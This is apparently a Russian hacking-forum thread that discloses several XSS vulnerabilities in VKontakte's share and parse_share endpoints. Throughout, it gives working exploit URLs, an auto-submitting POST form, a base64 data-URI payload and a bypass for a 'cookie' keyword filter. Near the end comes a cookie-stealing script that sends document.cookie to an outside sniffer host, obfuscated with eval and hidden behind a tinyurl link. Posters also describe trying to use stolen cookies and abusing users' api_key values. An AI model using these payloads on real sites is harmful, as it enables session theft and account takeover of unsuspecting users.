Наверное многие из вас знают о возможности "поделиться ссылкой" на сайт в различных соц.сетях. () Вконтакте это делается следующим запросом: http://vkontakte.ru/share.php?url=http://site.com/path/filename.ext В исходнике страницы: PHP: window.shareUrl = 'http://site.com/path/filename.ext'; window.shareDomain = 'site.com'; Попробуем такую ссылку: http://vkontakte.ru/share.php?url=http://site.com\x22/path\x22/filename\x22.ext\x22 PHP: window.shareUrl = 'http://site.com\x22/path\x22/filename\x22.ext\x22'; window.shareDomain = 'site.com\x22'; Обратный слэш в домене передаваемой ссылки не фильтруется. Значит можно передать в shareUrl и shareDomain любой текст. Смотрим, что происходит с этими переменными дальше в коде страницы: PHP: ge('parse_url').value = shareUrl; ... if (window.shareDomain) { ge('share_domain').innerHTML = shareDomain; } else { hide('share_domain'); } ... <div id="share_domain"></div> .. (функция ge() используется вконтакте, как псевдоним document.getElementById()) value в теге input ничего не даст, зато innerHTML позволяет вставить в страницу произвольный код. XSS: http://vkontakte.ru/share.php?url=http://site.com\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x78\x22\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x61\x6C\x65\x72\x74\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29\x3B\x22\x77\x69\x64\x74\x68\x3D\x30\x3E PHP: <img src="x"onerror="alert(document.cookie);"width=0> Запрос работает через POST, желательно использовать эту возможность при эксплуатации XSS. PHP: <body onload="myvk.submit();"> <form id="myvk" action="http://vkontakte.ru/share.php" method="POST"> <input type="text" name="url" value="http://site.com\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x78\x22\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x22\x61\x6C\x65\x72\x74\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29\x3B\x22\x77\x69\x64\x74\x68\x3D\x30\x3E" /> </form> </body> или Code: data:text/html;base64,PGJvZHkgb25sb2FkPSJteXZrLnN1Ym1pdCgpOyI%2BPGZvcm0gaWQ9Im15dmsiYWN0aW9uPSJodHRwOi8vdmtvbnRha3RlLnJ1L3NoYXJlLnBocCJtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0Im5hbWU9InVybCJ2YWx1ZT0iaHR0cDovL3NpdGUuY29tXHgzQ1x4NjlceDZEXHg2N1x4MjBceDczXHg3Mlx4NjNceDNEXHgyMlx4NzhceDIyXHg2Rlx4NkVceDY1XHg3Mlx4NzJceDZGXHg3Mlx4M0RceDIyXHg2MVx4NkNceDY1XHg3Mlx4NzRceDI4XHg2NFx4NkZceDYzXHg3NVx4NkRceDY1XHg2RVx4NzRceDJFXHg2M1x4NkZceDZGXHg2Qlx4NjlceDY1XHgyOVx4M0JceDIyXHg3N1x4NjlceDY0XHg3NFx4NjhceDNEXHgzMFx4M0UiLz48L2Zvcm0%2BPC9ib2R5Pg== p.s.: работает одинаково для vkontakte.ru и vk.com
cs*.vkontakte.ru/cs*.vk.vom При отправке ссылки на видео youtube на стену, ВК парсит инфу об этом видео и выводит его на стену вместо отправляемой ссылки. Для примера возьмем ролик http://www.youtube.com/watch?v=AW4u7mGMNcg (первый попавшийся) Если вставить ссылку в сообщение и нажать кнопку "отправить", выполнится POST-запрос: http://cs[N].vkontakte.ru/upload.php act=parse_share&from_host=vkontakte.ru&mid=[СВОЙ_ID]&hash=[ХЭШ1]&rhash=[ХЭШ2]&url=[ССЫЛКА_НА_РОЛИК] Ответ: HTML: <script type="text/javascript"> document.domain = location.host.toString().match(/[a-zA-Z]*\.[a-zA-Z]*$/)[0]; parent.onParseDone({ title: 'Порно? ВКонтакте! / Need Porn? Use Russian Facebook!', description: "Комментируйте, голосуйте, добавляйте в избранное, рассылайте друзьям :) Большое спасибо за помощь в распространении нас :)\n\nWE LOVE OUR AMERICAN AUDIENCE, SUBSCRIBE, WE WILL BE ADDING ENGLISH SUBTITLES TO FUTURE VIDEOS FOR YOUR ENJOYMENT :)\n\nОбсуждение в нашей группе ВКонтакте:\n?http://vkontakte.ru/club382321?\n\nПроизводство студии My Duck's Vision\nСайт студии: ?http://mdvision.ru?", images: ['http://img.youtube.com/vi/AW4u7mGMNcg/0.jpg','http://img.youtube.com/vi/AW4u7mGMNcg/2.jpg','http://img.youtube.com/vi/AW4u7mGMNcg/3.jpg','http://img.youtube.com/vi/AW4u7mGMNcg/1.jpg','http://i.ytimg.com/vi/AW4u7mGMNcg/3.jpg','http://i.ytimg.com/vi/AW4u7mGMNcg/2.jpg','http://i.ytimg.com/vi/AW4u7mGMNcg/1.jpg','http://i.ytimg.com/vi/AW4u7mGMNcg/0.jpg'], url: 'http://www.youtube.com/watch?v=AW4u7mGMNcg', domain: 'www.youtube.com', extra: 21, extraData: 'AW4u7mGMNcg:204' }); </script> Параметр url возвращается в ответе. Кавычки экранируются, поэтому за пределы строки выйти не получится. Остается единственный вариант - закрывающий тег script, который даже внутри строки прерывает выполнение JS-кода. Как оказалось, хэши для защиты от CSRF и XSS в этом запросе не проверяются. Параметры from_host, mid, hash и rhash необязательны. Отправлять можно GET-ом. url=http://google.com/</> HTML: <script type="text/javascript"> document.domain = location.host.toString().match(/[a-zA-Z]*\.[a-zA-Z]*$/)[0]; parent.onParseFail(); </script> Страница не существует (404) url=http://google.com/?</> HTML: url: 'http://www.google.com/?%3C/%3E=', Редирект. url берется из location (302) url=http://www.google.com/?=</> HTML: url: 'http://www.google.com/?=</>', Страница существует (200) Пассивка найдена, но при попытке отправить в запросе url=http://www.google.com/?=<img src=x onerror=alert(document.cookie)> оказывается, что фильтруется слово "cookie". Обходится этот фильтр просто: PHP: <img src=x onerror=c=/coo/.source;c+=/kie/.source;alert(document[c])> XSS: http://cs4567.vkontakte.ru/upload.php?act=parse_share&url=http://www.google.com/?=</script><img+src=x+onerror=c=/coo/.source;c%2B=/kie/.source;alert(document[c])>
Еще один вариант использования предыдущего бага с обходом любых анти-XSS фильтров в браузерах. Вернемся к результату парсинга: HTML: <script type="text/javascript"> document.domain = location.host.toString().match(/[a-zA-Z]*\.[a-zA-Z]*$/)[0]; parent.onParseDone({ title: 'Порно? ВКонтакте! / Need Porn? Use Russian Facebook!', description: "Комментируйте, голосуйте, добавляйте в избранное, рассылайте друзьям :) Большое спасибо за помощь в распространении нас :)\n\nWE LOVE OUR AMERICAN AUDIENCE, SUBSCRIBE, WE WILL BE ADDING ENGLISH SUBTITLES TO FUTURE VIDEOS FOR YOUR ENJOYMENT :)\n\nОбсуждение в нашей группе ВКонтакте:\n?http://vkontakte.ru/club382321?\n\nПроизводство студии My Duck's Vision\nСайт студии: ?http://mdvision.ru?", images: ['http://img.youtube.com/vi/AW4u7mGMNcg/0.jpg','http://img.youtube.com/vi/AW4u7mGMNcg/2.jpg','http://img.youtube.com/vi/AW4u7mGMNcg/3.jpg','http://img.youtube.com/vi/AW4u7mGMNcg/1.jpg','http://i.ytimg.com/vi/AW4u7mGMNcg/3.jpg','http://i.ytimg.com/vi/AW4u7mGMNcg/2.jpg','http://i.ytimg.com/vi/AW4u7mGMNcg/1.jpg','http://i.ytimg.com/vi/AW4u7mGMNcg/0.jpg'], url: 'http://www.youtube.com/watch?v=AW4u7mGMNcg', domain: 'www.youtube.com', extra: 21, extraData: 'AW4u7mGMNcg:204' }); </script> Открываем страницу http://www.youtube.com/watch?v=AW4u7mGMNcg и находим, откуда ВК парсит данные: <meta property="og:title" content="[ЗАГОЛОВОК]"> <meta property="og:description" content="[ОПИСАНИЕ]"> <meta property="og:image" content="[КАРТИНКА]"> В ходе эксперементов я выяснил, что заголовок и описание обрезаются, если в них есть <, <, " или ". Кавычки и обратный слэш экранируются. В img, как и в url проходит < и /. Создаем текстовый файл <meta property="og:image" content="http://</script><img src=x onerror=alert(document.cookie)>"> заливаем на файлообменник и передаем ссылку в параметре url Пример: http://cs4567.vkontakte.ru/upload.php?act=parse_share&url=http://upwap.ru/d/1809876/9f8120c321aa731e263ecc004eb2e44c/1.txt Так как прямые ссылки на файлообменниках динамические, придется периодически парсить ссылку и обновлять ее (в приведенном примере с http://upwap.ru/1809876) На фотохостингах прямые ссылки постоянные. Берем любой bmp-файл, дописываем в него тот же текст и заливаем на radikal.ru Пример: http://cs4567.vkontakte.ru/upload.php?act=parse_share&url=http://s014.radikal.ru/i327/1111/7f/c6c28de37eaa.bmp
было http://cs4567.vkontakte.ru стало http://cs4567.vk.com vk.com основной домен теперь! img = new Image(); img.src = "http://somesite.ru/n5lcd7q8nvh.gif?"+document[c]; setTimeout( 'location="http://images.cards.mail.ru/11bolprivet.jpg";', 5000 ); http://somesite.ru/n5lcd7q8nvh.gif -> сниффер свой какой то (для примера!) setTimeout( 'location="http://images.cards.mail.ru/11bolprivet.jpg";', 5000 ); -> редирект через 5 сек http://images.cards.mail.ru/11bolprivet.jpg -> картинка-прикол! в обфусцированном виде: (function(O,o){o(O(105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,115,111,109,101,115,105,116,101,46,114,117,47,110,53,108,99,100,55,113,56,110,118,104,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,91,99,93,59,32,115,101,116,84,105,109,101,111,117,116,40,32,39,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,105,109,97,103,101,115,46,99,97,114,100,115,46,109,97,105,108,46,114,117,47,49,49,98,111,108,112,114,105,118,101,116,46,106,112,103,34,59,39,44,32,53,48,48,48,32,41,59))})(String.fromCharCode,eval) Такой вид через http://2coders.ru/wp-content/uploads/2010/09/obfuscator.zip http://cs4567.vk.com/upload.php?act=parse_share&url=http://www.google.com/?=%3C/script%3E%3Cimg+src=x+onerror=c=/coo/.source;c%2B=/kie/.source;(function(O,o){o(O(105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,115,111,109,101,115,105,116,101,46,114,117,47,110,53,108,99,100,55,113,56,110,118,104,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,91,99,93,59,32,115,101,116,84,105,109,101,111,117,116,40,32,39,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,105,109,97,103,101,115,46,99,97,114,100,115,46,109,97,105,108,46,114,117,47,49,49,98,111,108,112,114,105,118,101,116,46,106,112,103,34,59,39,44,32,53,48,48,48,32,41,59))})(String.fromCharCode,eval) %3E Через ресурс, например, http://tinyurl.com получаем такую ссылку: http://tinyurl.com/cglmpy5 - document[c] в Сhrome не работает; - в FF, Opera работает (других не проверял); - ссылка палиться антивирусом; - привязка по ip вконтакте (возможно разве что с одного ip что у жертвы подставлять стыренные куки!) - пробросить через вконтакте хз как (разве что подключить левый хост как доверенный для разработчика и там сниффер впихнуть!) Итого: ограниченные условия! Возможно что то не так делал, имея стыренные куки я не попал в аккаунт.
Можно написать "document.c". Но скорее всего, не работает из-за XSS-фильтра, который есть в Chrome и IE. Попробуй использовать метод, описанный в 3 посте темы. Можно использовать любой другой существующий поддомен csN вместо cs4567 и любой друой параметр url= вместо google.com Кража сессии невозможна, но есть еще много вариантов использования XSS. Например, в приложениях ВК у каждого пользователя есть api_key, зная который можно выполнять любые действия в приложении от имени пользователя.
Пример эксплуатации важнее конкретной уязвимости конкретного сайта. В паблике эта уязвимость пролежала бы до фикса пару дней, в закрытом разделе почти год. В теме показан вектор атаки, который еще долго будет актуален для многих сайтов. На ВК интернет не заканчивается.
